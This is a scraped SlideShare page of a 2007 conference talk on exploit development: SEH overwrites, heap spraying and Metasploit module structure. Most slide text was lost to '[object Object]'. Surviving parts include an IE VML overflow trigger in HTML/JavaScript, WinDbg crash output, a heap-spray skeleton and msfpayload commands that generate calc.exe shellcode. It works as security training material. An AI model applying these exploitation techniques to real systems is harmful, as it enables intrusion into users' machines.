SlideShare una empresa de Scribd logo

Writing Metasploit Plugins

A
amiable_indian

Writing Metasploit Plugins

TecnologíaArte y fotografía
1 de 58
More on Metasploit plugins from vulnerability to exploit Saumil Shah ceo, net-square IT Underground - Prague 2007
[object Object],[object Object],[object Object],[object Object],# who am i # who am i 16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33 USER TTY FROM LOGIN@ IDLE WHAT saumil console - 11:43 0:05 bash
From Vulnerability to Exploit Fuzzing EIP = 0x41414141 Debugger Attack Vector Reliable EIP return address Bad characters Test Shellcode (INT 3) INT 3? Final Shellcode Working exploit Shellcode Handling
The CPU’s registers ,[object Object],ESP EAX EBP EBX ESI ECX EDI EDX EIP accumulator base counter data instruction pointer destination index source index base pointer stack pointer
The Process Memory Map environment vars cmd line arguments **envp **argv argc main() local vars … v heap ^ stack … heap - malloc’ed data .bss .data .text 0xc0000000 0x08000000
Win32 Process Memory Map No access Shared user page PEB First TEB DLLs DLLs DLLs heap program image error trapping 0x7FFFFFFF 0x00000000 0x00010000 stack 0x7FFE1000 0x7FFE0000 0x7FFDF000 0x7FFDE000 0x40000000
Exploit example - IE VML overflow ,[object Object],[object Object],[object Object],[object Object],[object Object]
Windows SEH ,[object Object],[object Object],[object Object]
Exception handling ,[object Object],[object Object],try { : code that may throw : an exception. } catch { : attempt to recover from : the exception gracefully. }
Exception handling … implementation params saved EIP saved EBP Bottom of stack more frames frame w/ exception handling local vars addr of exception handler exception handler code (catch block)
SEH Record ,[object Object],[object Object],[object Object],[object Object],address of exception handler ptr to next SEH record
SEH Chain ,[object Object],addr of ex_handler1 ptr to SEH_record_2 addr of ex_handler2 ptr to next SEH_record_n default exception handler 0xFFFFFFFF MSVCRT!exhandler ex_handler1() ex_handler2() bottom of stack
SEH on the stack address of exception handler 0xFFFFFFFF main() ^ stack func_z() initial entry frame MSVCRT!exhandler address of exception handler ptr to next SEH record ex_handler_z() params saved EBP saved EIP local vars
Yet another way of getting EIP ,[object Object],[object Object],[object Object],[object Object],[object Object]
Overwriting SEH address of exception handler ptr to next SEH record ex_handler() params saved EBP saved EIP buffer
Overwriting SEH AAAA AAAA AAAA : : : AAAA AAAA ex_handler() AAAA AAAA AAAA AAAA AAAA Illegal memory access causes segmentation fault. OS invokes registered exception handler in the chain EIP = 0x42424242 AAAA
ie_vml1 ,[object Object],<head> <object id=&quot;VMLRender” classid=&quot;CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E&quot;> </object> <style>v* { behavior: url(#VMLRender); }</style> </head> <body> <v:rect style='width:120pt;height:80pt' fillcolor=&quot;red&quot;> <script> document.write(&quot;<v:fill method =amp;quot;&quot;); for(i = 0; i < 2625; i++) document.write(&quot;&#x4141&#x4141&#x4141&#x4141&quot;); document.write(&quot;amp;quot;>&quot;); </script> </v:rect></v:fill></body>
Setting up the exploit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],$ ./daemon.pl ie_vml1.html [*] Starting HTTP server on 8080 0:005> gh
Crashing IE ,[object Object],[object Object],(18c.584): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0013b4c4 ebx=001df20c ecx=0013b4b8 edx=00004141 esi=0000259e edi=00140000 eip=5deded1e esp=0013b4a0 ebp=0013b6c8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:rogram Filesommon Filesicrosoft SharedGXgx.dll - vgx!$DllMain$_gdiplus+0x30e8d: 5deded1e 668917 mov [edi],dx ds:0023:00140000=6341 0:000> !exchain 0013e420: 41414141 Invalid exception stack at 41414141
Crashing IE ,[object Object],0:000> !exchain 0013e420: 41414141 Invalid exception stack at 41414141 0:000> g (18c.584): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000 eip=41414141 esp=0013b0d0 ebp=0013b0f0 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 41414141 ?? ???
EIP = 0x41414141 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
How do we pull it off? ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Loading our buffer in the heap ,[object Object],[object Object],[object Object],[object Object]
Heap Spraying ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Heap Spraying NOP sled shellcode NOP sled shellcode NOP sled shellcode <script> : spray = build_large_nopsled(); a = new Array(); for(i = 0; i < 100; i++) a[i] = spray + shellcode; : </script> <html> : exploit trigger condition goes here : </html> a[7] a[8] a[9]
Tips on Heap Spraying ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
ie_vml2 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],$ ./daemon.pl ie_vml2.html [*] Starting HTTP server on 8080 0:005> gh
Crashing IE again ,[object Object],[object Object],0:000> s 02000000 l fffffff 90 90 90 90 cc cc cc cc 02150020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02360020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02570020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02780020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02990020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02ba0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02db0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02fc0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 031d0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 033e0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ : : :
Jump to heap ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Introducing Metasploit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Introducing Metasploit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Enter Shellcode ,[object Object],[object Object],[object Object],[object Object]
Writing Shellcode ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Injecting the shellcode ,[object Object],[object Object],[object Object]
A little about shellcode ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Payload Encoders ,[object Object],[object Object],[object Object],[object Object],[object Object]
Payload Encoders ,[object Object],[object Object],[object Object],decoder UnWQ89Jas281EEIIkla2wnhaAS901las original shellcode (ascii 0-255)
Payload Encoders ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Using Metasploit to generate shellcode ,[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],Generate calc.exe shellcode $ ./msfpayload win32_exec EXITFUNC=“seh” CMD=“calc.exe” R | ./jsencode.pl
Exit function - “thread” vs. “seh” ,[object Object],[object Object],$ ./msfpayload win32_exec EXITFUNC=“thread” CMD=“calc.exe” R | ./jsencode.pl
Writing Metasploit exploit modules ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
How Metasploit runs an exploit List of known target values user supplied exploit info Metasploit Shellcode Library Encoders Payload handlers create payload launch attack get connection EXPLOIT preamble
Writing a Metasploit exploit ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Structure of the exploit perl module package Msf::Exploit::name; use base “Msf::Exploit”; use strict; use Pex::Text; my $advanced = { }; my $info = { }; sub new { } sub Exploit { } information block constructor return an instance of our exploit exploit block
%info ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Metasploit Pex ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Pex::Text ,[object Object],[object Object],[object Object],[object Object],[object Object]
Pex::Socket ,[object Object],[object Object],[object Object],[object Object]
Pex - protocol specific utilities ,[object Object],[object Object],[object Object],[object Object],[object Object]
Pex - miscellaneous utilities ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
metasploit_skel.pm ,[object Object],[object Object],[object Object],[object Object],[object Object]
Finished examples ,[object Object]
Some command line Metasploit tools ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
More command line Metasploit tools ,[object Object],[object Object],[object Object],[object Object]
New in Version 3.0 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
New in Version 3.0 ,[object Object],[object Object],[object Object],[object Object],[object Object]
Thank You! Saumil Shah [email_address] http://net-square.com +91 98254 31192

Recomendados

Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
Hossein Yavari
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
N map presentation
N map presentationN map presentation
N map presentation
ulirraptor
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
Sam Bowne
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
Joe Desimone
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
Phannarith Ou, G-CISO
 

Recomendados

Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
Hossein Yavari
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
N map presentation
N map presentationN map presentation
N map presentation
ulirraptor
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
Sam Bowne
 
Taking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in MemoryTaking Hunting to the Next Level: Hunting in Memory
Taking Hunting to the Next Level: Hunting in Memory
Joe Desimone
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
Phannarith Ou, G-CISO
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of Malware
Natraj G
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
InfoSec Addicts
 
Memory forensics.pptx
Memory forensics.pptxMemory forensics.pptx
Memory forensics.pptx
9905234521
 
Memory forensics
Memory forensicsMemory forensics
Memory forensics
Sunil Kumar
 
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
Sam Bowne
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
Sergey Soldatov
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
Sam Bowne
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
Mohammed Akbar Shariff
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
n|u - The Open Security Community
 
Windows registry forensics
Windows registry forensicsWindows registry forensics
Windows registry forensics
Taha İslam YILMAZ
 
Linux Memory Analysis with Volatility
Linux Memory Analysis with VolatilityLinux Memory Analysis with Volatility
Linux Memory Analysis with Volatility
Andrew Case
 
CNIT 126 4: A Crash Course in x86 Disassembly
CNIT 126 4: A Crash Course in x86 DisassemblyCNIT 126 4: A Crash Course in x86 Disassembly
CNIT 126 4: A Crash Course in x86 Disassembly
Sam Bowne
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
Aryan G
 
CNIT 126: 8: Debugging
CNIT 126: 8: DebuggingCNIT 126: 8: Debugging
CNIT 126: 8: Debugging
Sam Bowne
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Jared Greenhill
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Black Hat 2015 Arsenal: Noriben Malware Analysis
Black Hat 2015 Arsenal: Noriben Malware AnalysisBlack Hat 2015 Arsenal: Noriben Malware Analysis
Black Hat 2015 Arsenal: Noriben Malware Analysis
Brian Baskin
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
Michael Gough
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 

Más contenido relacionado

La actualidad más candente

Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
GreenD0g
 
Memory forensics
Memory forensicsMemory forensics
Memory forensics
Sunil Kumar
 

La actualidad más candente (20)

Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of Malware
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
 
Memory forensics.pptx
Memory forensics.pptxMemory forensics.pptx
Memory forensics.pptx
 
Memory forensics
Memory forensicsMemory forensics
Memory forensics
 
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
Practical Malware Analysis: Ch 7: Analyzing Malicious Windows Programs
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static TechniquesCNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
CNIT 126 Ch 0: Malware Analysis Primer & 1: Basic Static Techniques
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Windows registry forensics
Windows registry forensicsWindows registry forensics
Windows registry forensics
 
Linux Memory Analysis with Volatility
Linux Memory Analysis with VolatilityLinux Memory Analysis with Volatility
Linux Memory Analysis with Volatility
 
CNIT 126 4: A Crash Course in x86 Disassembly
CNIT 126 4: A Crash Course in x86 DisassemblyCNIT 126 4: A Crash Course in x86 Disassembly
CNIT 126 4: A Crash Course in x86 Disassembly
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
 
CNIT 126: 8: Debugging
CNIT 126: 8: DebuggingCNIT 126: 8: Debugging
CNIT 126: 8: Debugging
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced ActorsMemory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Black Hat 2015 Arsenal: Noriben Malware Analysis
Black Hat 2015 Arsenal: Noriben Malware AnalysisBlack Hat 2015 Arsenal: Noriben Malware Analysis
Black Hat 2015 Arsenal: Noriben Malware Analysis
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
 

Destacado

Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
Z Chen
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode Execution
Ryan Wincey
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Positive Hack Days
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-Ltd
Ali Hussain
 

Destacado (20)

Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode Execution
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writing
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Metasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-LtdMetasploit-TOI-Ebryx-PVT-Ltd
Metasploit-TOI-Ebryx-PVT-Ltd
 
Informationssicherheit im Übersetzungsprozess
Informationssicherheit im ÜbersetzungsprozessInformationssicherheit im Übersetzungsprozess
Informationssicherheit im Übersetzungsprozess
 
Penetration test
Penetration testPenetration test
Penetration test
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
Tranning-2
Tranning-2Tranning-2
Tranning-2
 

Similar a Writing Metasploit Plugins

Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Jagadisha Maiya
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
linuxlab_conf
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
Linaro
 

Similar a Writing Metasploit Plugins (20)

Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device DriversTroubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting Linux Kernel Modules And Device Drivers
 
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Code Red Security
Code Red SecurityCode Red Security
Code Red Security
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
Heap overflows for humans – 101
Heap overflows for humans – 101Heap overflows for humans – 101
Heap overflows for humans – 101
 
The n00bs guide to ovs dpdk
The n00bs guide to ovs dpdkThe n00bs guide to ovs dpdk
The n00bs guide to ovs dpdk
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
Windbg랑 친해지기
Windbg랑 친해지기Windbg랑 친해지기
Windbg랑 친해지기
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Bsides
BsidesBsides
Bsides
 
Static analysis and writing C/C++ of high quality code for embedded systems
Static analysis and writing C/C++ of high quality code for embedded systemsStatic analysis and writing C/C++ of high quality code for embedded systems
Static analysis and writing C/C++ of high quality code for embedded systems
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
 

Más de amiable_indian

Phishing As Tragedy of the Commons
Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commons
amiable_indian
 
Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art
amiable_indian
 
Secrets of Top Pentesters
Secrets of Top PentestersSecrets of Top Pentesters
Secrets of Top Pentesters
amiable_indian
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
amiable_indian
 
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
amiable_indian
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
amiable_indian
 
State of Cyber Law in India
State of Cyber Law in IndiaState of Cyber Law in India
State of Cyber Law in India
amiable_indian
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the ugly
amiable_indian
 
Reverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure CodingReverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure Coding
amiable_indian
 
Network Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons LearnedNetwork Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons Learned
amiable_indian
 
Economic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds DissectedEconomic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds Dissected
amiable_indian
 
Immune IT: Moving from Security to Immunity
Immune IT: Moving from Security to ImmunityImmune IT: Moving from Security to Immunity
Immune IT: Moving from Security to Immunity
amiable_indian
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
amiable_indian
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
amiable_indian
 
Web Exploit Finder Presentation
Web Exploit Finder PresentationWeb Exploit Finder Presentation
Web Exploit Finder Presentation
amiable_indian
 

Más de amiable_indian (20)

Phishing As Tragedy of the Commons
